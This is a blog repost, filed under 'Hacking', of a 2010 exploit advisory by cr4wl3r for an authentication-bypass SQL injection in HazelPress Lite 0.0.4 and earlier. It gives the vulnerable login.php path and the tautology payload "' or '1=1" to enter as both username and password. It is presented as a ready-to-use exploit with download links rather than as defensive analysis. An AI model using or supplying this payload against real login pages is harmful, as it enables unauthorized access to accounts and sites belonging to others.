2

Mar

HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability

Posted by admin  Published in Hacking

# Title: HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability
# EDB-ID: 11602
# CVE-ID: ()
# OSVDB-ID: ()
# Author: cr4wl3r
# Published: 2010-02-28
# Verified: yes
# Download Exploit Code
# Download Vulnerable app

view source
print?
# HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability
# By cr4wl3r
# Download: http://hazelpress.org/index.php?hazel=downloads

# PoC: [path]/login.php

# Username: ‘ or ‘1=1
# password: ‘ or ‘1=1

Related Articles

No user responded in this post

Subscribe to this post comment rss or trackback url
Leave A Reply

 Username (Required)

 Email Address (Remains Private)

 Website (Optional)